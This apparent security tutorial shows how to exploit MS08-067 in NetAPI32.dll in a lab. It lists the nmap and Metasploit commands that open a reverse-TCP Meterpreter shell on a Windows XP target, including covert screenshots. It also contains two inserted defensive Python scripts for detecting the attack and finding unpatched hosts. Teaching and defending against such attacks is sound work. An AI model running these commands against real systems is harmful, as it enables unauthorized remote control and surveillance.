Exploiting NetAPI32.dll Using Metasploit

May 22, 2018


In this OP3N article, we’re going to see how a Windows XP machine can be compromised just by knowing its IP address. It should be noted, however, that only a few government offices in India still run Windows XP, owing to poor management of their software. I suggest that you do not go looking for such offices to crack. Instead, let’s walk through hacking a Windows XP machine in a virtualized environment.

The thing is that nobody is spending enough money to upgrade their software to newer operating systems, and Microsoft is no longer patching Windows XP. So we’re left with an unpatched and vulnerable operating system.

Now, enough with the details; you guys know this already. Let’s move on and see what we’re actually going to hack on a remote Win XP machine.

There are numerous ways to exploit a Win XP machine, and today we’re going to exploit the parsing flaw in the path canonicalization code of NetAPI32.dll, as used by the Server service, described in CVE-2008-4250.

So, what exactly is a server service vulnerability?

The Server service in Microsoft Windows provides support for sharing resources, such as files and printers, over a network. This service is vulnerable to remote code execution, and NetAPI32.dll is the cause of the vulnerability: when it processes a directory-traversal character sequence in a path name, an error occurs inside NetAPI32.dll.

The vulnerability can be exploited by corrupting stack memory, for example by sending RPC requests that contain specially crafted path names to the Server service component. The affected function is NetprPathCanonicalize() in NetAPI32.dll.
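The description above gives a defender everything needed to recognise this traffic: a DCE/RPC call over the srvsvc named pipe to NetprPathCanonicalize whose path argument carries directory-traversal sequences, which no ordinary client sends to the Server service. The following detection heuristic is an added example, not code from the original article; it assumes an upstream SMB/DCE-RPC decoder has already produced records with the pipe name, opnum and decoded path argument (the field names, the opnum constant and the sample records are all constructed for this example).

```python
"""Defender-side detection heuristic for MS08-067 (CVE-2008-4250) probes.

Added example, not from the original article. It keys on the feature the
vulnerability description and public IDS signatures share: a call on the
srvsvc pipe to NetprPathCanonicalize whose path argument contains
directory-traversal sequences or is implausibly long. Records are assumed
to come from an upstream SMB/DCE-RPC decoder; the samples are constructed.
"""
from dataclasses import dataclass

# Opnum of NetprPathCanonicalize on the srvsvc interface (assumed constant,
# the value detection signatures for MS08-067 commonly match on).
NETPR_PATH_CANONICALIZE_OPNUM = 31


@dataclass(frozen=True)
class RpcCall:
    src: str
    dst: str
    pipe: str        # named pipe the bind targeted, e.g. "srvsvc"
    opnum: int
    path_arg: str    # decoded PathName argument, "" when not applicable


def is_suspicious_canonicalize(call: RpcCall, max_benign_len: int = 260) -> bool:
    """Return True when a canonicalize call looks like an MS08-067 probe.

    Legitimate callers pass ordinary share paths; a path with repeated
    "..\\" components, or one longer than MAX_PATH (260), is not something a
    normal client hands to the Server service.
    """
    if call.pipe.lower() != "srvsvc" or call.opnum != NETPR_PATH_CANONICALIZE_OPNUM:
        return False
    p = call.path_arg
    traversal = p.count("..\\") + p.count("../")
    return traversal >= 2 or len(p) > max_benign_len


def triage_calls(calls):
    """Group flagged calls by source so a responder sees one entry per peer."""
    hits = {}
    for c in calls:
        if is_suspicious_canonicalize(c):
            hits.setdefault(c.src, []).append(c.dst)
    return hits


# Constructed sample traffic: a benign canonicalize, a benign call on another
# opnum, and two probes from the same source against two hosts.
SAMPLE_CALLS = [
    RpcCall("10.0.0.5", "10.0.0.1", "srvsvc", 31, "\\\\10.0.0.1\\share\\docs"),
    RpcCall("10.0.0.5", "10.0.0.1", "srvsvc", 15, ""),
    RpcCall("10.0.0.3", "10.0.0.1", "srvsvc", 31, "\\..\\..\\..\\..\\" + "A" * 300),
    RpcCall("10.0.0.3", "10.0.0.2", "srvsvc", 31, "\\..\\..\\x"),
]

if __name__ == "__main__":
    for src, dsts in triage_calls(SAMPLE_CALLS).items():
        print(f"ALERT possible MS08-067 probe from {src} -> {', '.join(dsts)}")
```

The two thresholds are deliberately loose: a single `..\` in a short path is left alone because some legitimate tooling does pass relative components, while two or more, or a path beyond MAX_PATH, is rare enough in benign traffic that an alert per source is cheap to review. On a host that is still unpatched, the same request is also the moment the Server service crashes when the exploit misfires, so an svchost.exe crash on a machine in this list is a second, host-side signal worth correlating.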

However, this vulnerability is not limited to Windows XP; it exists in other operating systems as well. Other systems that can be exploited through this method are Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008.

Exploitation

Since I’m doing all this in a virtualized environment, I’ve created two virtual machines and installed Win XP on one and Kali Linux on the other.

First of all, go to your Win XP machine and open the command prompt. Type ipconfig to find the IP address of the vulnerable machine. For example, the IP address of my Win XP machine is 10.0.0.1.

Fire up the Kali Linux machine and open a terminal. Inside the terminal, write the following command to get a list of all opened ports and the version of the operating system:

#nmap -O 10.0.0.1
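The same scan is more useful to the people who have to defend these machines than to an attacker: run over your own inventory, it tells you which hosts still expose SMB on one of the platforms listed above as affected, and therefore need the MS08-067 update (KB958644) or TCP 139/445 blocked. The triage script below is an added example, not code from the original article; it parses nmap's normal output format, and the scan text, host addresses and OS fingerprints in it are constructed for the example.

```python
"""Triage nmap -O output for hosts still exposed to MS08-067 (CVE-2008-4250).

Added example, not from the original article. Meant for a defender running
"nmap -O" across their own hosts: a host is flagged when SMB (TCP 139/445)
is open and the OS fingerprint matches one of the platforms the article
lists as affected. The scan output below is constructed for the example.
"""
import re

# Platforms the article names as affected, matched against nmap's
# "Running:" and "OS details:" lines, case-insensitively.
AFFECTED_OS_PATTERNS = [
    r"windows 2000",
    r"windows xp",
    r"windows server 2003|windows 2003",
    r"windows vista",
    r"windows server 2008|windows 2008",
]
SMB_PORTS = {139, 445}

HOST_RE = re.compile(r"^Nmap scan report for (\S+)", re.M)
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\b", re.M)
OS_RE = re.compile(r"^(?:Running|OS details): (.+)$", re.M)


def parse_nmap(text):
    """Split normal-format nmap output into {host: {"ports": set, "os": str}}."""
    hosts = {}
    # Each host block begins with a "Nmap scan report for" line.
    starts = [m.start() for m in HOST_RE.finditer(text)] + [len(text)]
    for i in range(len(starts) - 1):
        block = text[starts[i]:starts[i + 1]]
        name = HOST_RE.search(block).group(1)
        ports = {int(p) for p in PORT_RE.findall(block)}   # open TCP ports only
        hosts[name] = {"ports": ports, "os": " / ".join(OS_RE.findall(block))}
    return hosts


def ms08_067_exposed(host_info):
    """True when SMB is reachable and the OS family is one the bulletin covers."""
    smb_open = bool(host_info["ports"] & SMB_PORTS)
    os_hit = any(re.search(p, host_info["os"], re.I) for p in AFFECTED_OS_PATTERNS)
    return smb_open and os_hit


def triage_scan(text):
    """Sorted list of hosts that need the MS08-067 patch or SMB blocked."""
    return sorted(h for h, info in parse_nmap(text).items() if ms08_067_exposed(info))


# Constructed scan: an XP host with SMB open, a Windows 10 host with SMB open
# (not covered by the bulletin), and an XP host whose SMB ports are filtered.
SAMPLE_SCAN = """\
Nmap scan report for 10.0.0.1
Host is up (0.00050s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP2 or SP3

Nmap scan report for 10.0.0.7
Host is up (0.00040s latency).
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
Running: Microsoft Windows 10
OS details: Microsoft Windows 10 1709 - 1909

Nmap scan report for 10.0.0.9
Host is up (0.00060s latency).
PORT     STATE    SERVICE
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP3
"""

if __name__ == "__main__":
    for host in triage_scan(SAMPLE_SCAN):
        print(f"{host}: SMB reachable on an MS08-067-affected platform; "
              "confirm KB958644 is installed or block TCP 139/445")
```

The third host shows why the port check matters as much as the fingerprint: an XP box whose SMB ports are filtered by a host or network firewall is not reachable by this exploit even though it is unpatched, so it drops out of the list, while the Windows 10 host with SMB open is ignored because the bulletin does not cover it. Feed the script real `nmap -O` output (`python3 triage.py < scan.txt` after swapping `SAMPLE_SCAN` for `sys.stdin.read()`) to get the same list for an actual network.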

At this point, we’ve gathered a lot of information, and now it’s time to fire up Metasploit! So go over to the terminal in Kali and type msfconsole.

It’ll take a while to open up, and once it does, type in the search command to search for modules related to netapi:

> search netapi

There, you’ll find the module exploit/windows/smb/ms08_067_netapi. This is the module that we’re going to use for our exploitation purposes. Set the Meterpreter payload before selecting the module that exploits the MS08-067 flaw in the Server service:

> set payload windows/meterpreter/reverse_tcp

> use exploit/windows/smb/ms08_067_netapi

> show options

Now, set LHOST to 10.0.0.3 (IP of my Kali machine):

> set LHOST 10.0.0.3

Set RHOST to 10.0.0.1 (IP of my WinXP machine):

> set RHOST 10.0.0.1

Finally, type exploit to start the remote exploitation process. It’ll open a Meterpreter session between your Kali machine and the Windows machine that lets you execute commands on the Win XP machine remotely. For example, the screenshot command takes a screenshot of the target machine without the user working on that remote machine knowing about it.
